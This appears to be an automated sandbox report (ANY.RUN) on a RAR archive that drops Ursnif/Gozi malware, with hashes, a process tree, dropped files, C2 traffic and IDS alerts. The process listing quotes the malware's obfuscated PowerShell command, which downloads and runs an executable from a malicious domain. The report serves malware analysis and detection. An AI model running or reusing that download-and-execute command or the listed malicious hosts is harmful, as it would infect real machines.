File name: 1.rar
Full analysis: https://app.any.run/tasks/566b2183-3d49-49d6-b062-d12229faf38a
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 25, 2019, 10:30:27
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: loader, trojan, gozi, ursnif, evasion, dreambot
Indicators:
MIME: application/x-rar
File info: RAR archive data, flags: EncryptedBlockHeader
MD5: B7DB46FBA8C56E721AF37E643B6EE782
SHA1: F7EC6AE41FFE0069A8EA1E051687B0EE323A9B7E
SHA256: 745C652A77178823A21B0983CE6E004629C9B067DFC7DD81D14F3919D4FC4E97
SSDEEP: 384:k4X7NiZx2kyf+5BRne02r+Th9fenxl94FEHhO/:hiZx2kySFlTe/94SHhO/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • TempSKg43.exe (PID: 1984)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3632)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2268)
    • Detected URSNIF Trojan

      • TempSKg43.exe (PID: 1984)
    • Runs injected code in another process

      • TempSKg43.exe (PID: 1984)
    • Application was injected by another process

      • explorer.exe (PID: 252)
    • URSNIF Shellcode was detected

      • explorer.exe (PID: 252)
    • Changes the autorun value in the registry

      • explorer.exe (PID: 252)
    • Connects to CnC server

      • explorer.exe (PID: 252)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2268)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2540)
      • explorer.exe (PID: 252)
    • Executes scripts

      • WinRAR.exe (PID: 2868)
    • Creates files in the user directory

      • powershell.exe (PID: 2268)
      • TempSKg43.exe (PID: 1984)
    • Checks for external IP

      • nslookup.exe (PID: 2212)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v-4.x) (58.3)
.rar | RAR compressed archive (gen) (41.6)
No data.
All screenshots are available in the full report
Total processes: 41
Monitored processes: 9
Malicious processes: 5
Suspicious processes: 0

Behavior graph

(graph image not reproduced; process chain as shown) winrar.exe → wscript.exe → cmd.exe → powershell.exe → tempskg43.exe [#URSNIF] → (inject) explorer.exe [#URSNIF] → cmd.exe → nslookup.exe; explorer.exe → cmd.exe

Process information

PID 2868 | WinRAR.exe | Parent process: explorer.exe
  CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\1.rar"
  Path: C:\Program Files\WinRAR\WinRAR.exe
  User: admin
  Company: Alexander Roshal
  Integrity Level: MEDIUM
  Description: WinRAR archiver
  Version: 5.60.0

PID 2540 | WScript.exe | Parent process: WinRAR.exe
  CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIb2868.25504\2.js"
  Path: C:\Windows\System32\WScript.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Microsoft ® Windows Based Script Host
  Exit code: 0
  Version: 5.8.7600.16385

PID 3632 | cmd.exe | Parent process: WScript.exe
  CMD: "C:\Windows\System32\cmd.exe" /c LtmVTxhyZgAGjYU & p^owEr^she^lL.e^Xe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://news-medias.ru/report.exe','%temp%SKg43.exe'); & start %temp%SKg43.exe & eCAWmzyjnGvNIBa
  Path: C:\Windows\System32\cmd.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows Command Processor
  Exit code: 1
  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 2268 | powershell.exe | Parent process: cmd.exe
  CMD: powErshelL.eXe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://news-medias.ru/report.exe','C:\Users\admin\AppData\Local\TempSKg43.exe');
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows PowerShell
  Exit code: 0
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 1984 | TempSKg43.exe | Parent process: cmd.exe
  CMD: C:\Users\admin\AppData\Local\TempSKg43.exe
  Path: C:\Users\admin\AppData\Local\TempSKg43.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0

PID 252 | explorer.exe
  CMD: C:\Windows\Explorer.EXE
  Path: C:\Windows\explorer.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows Explorer
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3868 | cmd.exe | Parent process: explorer.exe
  CMD: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\admin\AppData\Local\Temp\BF0E.bi1"
  Path: C:\Windows\system32\cmd.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows Command Processor
  Exit code: 0
  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 2212 | nslookup.exe | Parent process: cmd.exe
  CMD: nslookup myip.opendns.com resolver1.opendns.com
  Path: C:\Windows\system32\nslookup.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: nslookup
  Exit code: 0
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3080 | cmd.exe | Parent process: explorer.exe
  CMD: cmd /C "echo -------- >> C:\Users\admin\AppData\Local\Temp\BF0E.bi1"
  Path: C:\Windows\system32\cmd.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows Command Processor
  Exit code: 0
  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events: 790
Read events: 685
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 1
Suspicious files: 3
Text files: 2
Unknown types: 0

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
2268 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\01Z5N0TFZI5EFWIXK8LK.temp | - | - | -
1984 | TempSKg43.exe | C:\Users\admin\AppData\Roaming\Microsoft\Devivmgr\crypptsp.exe | - | - | -
3868 | cmd.exe | C:\Users\admin\AppData\Local\Temp\BF0E.bi1 | - | - | -
3080 | cmd.exe | C:\Users\admin\AppData\Local\Temp\BF0E.bi1 | - | - | -
252 | explorer.exe | C:\Users\admin\AppData\Local\Temp\A11B.bin | - | - | -
252 | explorer.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs.js | text | 70CA454C915FEF80E1CB1551DEBF1712 | B4E4CADAE75F0726BFA923467AB414F323D81A90404BD0A356CC7C4158536653
2268 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 5F9A7BF5388376D94C2EDCA422810BEC | 8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
2868 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb2868.25504\2.js | text | 0A940D03B77D951E2CCF07073C31EFF7 | BA1FD6DD130D91182F9D0EB9E0C542B0982B87B4213BED08D0CCBD7827074F5C
2268 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF132444.TMP | binary | 5F9A7BF5388376D94C2EDCA422810BEC | 8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
252 | explorer.exe | C:\Users\admin\AppData\Local\Temp\B6C4.bin | compressed | 5D272CE5EEE9F6A38706946D600A497C | 06A4500605FF1351DB8421102E9DB69353DEEC401684CB8B22419BB6B3423125
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 3
TCP/UDP connections: 6
DNS requests: 7
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
252 | explorer.exe | GET | - | 217.12.199.168:80 | http://adonis-medicine.at/images/wE_2FWk_/2FK_2FOf9wNMpRVKv_2F16_/2FvX1iG2je/PlG2iB4enrlPk_2F2/OBqJDP3y5l3C/M8wUEwiDMEI/7hk1w_2Fbx81vM/4FalFJ40banE23EleSK9I/LAPJKUrwmFYDpSsI/up6p_2BlntANAuf/AB5JkQOS3d_2FzoTb7/iq4whRNxa/IWmD1S_2BSGtnwQovB3S/g7K7StOCeyW/4BM_2Fna/w.gif | UA | - | - | malicious
252 | explorer.exe | POST | - | 217.12.199.168:80 | http://adonis-medicine.at/images/bwNGYsy_2BTSa/WbOiK6_2/FPl0vr0PCJCyYwjVgaz_2FJ/ldflt_2BIC/9Arbl7jgVPEnCy_2F/DcM0D1yG1mDi/8Gg_2Fs6Vno/wmzooXu15DsGlR/D0pIQphEeuV3jeZOq_2F1/PqQR9KTys9GeQyFA/HBCOEnHl4t9sm98/4dC7vdMg0qPN5Kxw0a/wTvfEKC_2/BfRwlp4HFidjSb5qVuXL/QVfVd92kB/oT8hvsIFPRF4/wx.bmp | UA | - | - | malicious
2268 | powershell.exe | GET | 200 | 143.208.165.41:80 | http://news-medias.ru/report.exe | DO | executable | 544 Kb | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
- | - | 217.12.199.168:80 | news-medias.ru | ITL Company | UA | malicious
2212 | nslookup.exe | 208.67.222.222:53 | resolver1.opendns.com | OpenDNS, LLC | US | malicious
2268 | powershell.exe | 143.208.165.41:80 | news-medias.ru | Columbus Networks USA, Inc. | DO | malicious
252 | explorer.exe | 217.12.199.168:80 | news-medias.ru | ITL Company | UA | malicious

DNS requests

Domain | IP | Reputation
news-medias.ru | multiple resolved IPs (listed in the full report) | malicious
11totalzaelooop11.club | - | unknown
resolver1.opendns.com | 208.67.222.222 | shared
222.222.67.208.in-addr.arpa | - | unknown
myip.opendns.com | 185.117.118.92 | shared
adonis-medicine.at | multiple resolved IPs (listed in the full report) | malicious

Threats

PID | Process | Class | Message
2268 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
2212 | nslookup.exe | Potential Corporate Privacy Violation | ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
2212 | nslookup.exe | Potential Corporate Privacy Violation | ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
252 | explorer.exe | A Network Trojan was detected | ET TROJAN Ursnif Variant CnC Beacon
252 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
252 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] W32.Dreambot HTTP
252 | explorer.exe | A Network Trojan was detected | ET TROJAN Ursnif Variant CnC Data Exfil
252 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
252 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] W32.Dreambot HTTP
4 ETPRO signatures available at the full report
No debug info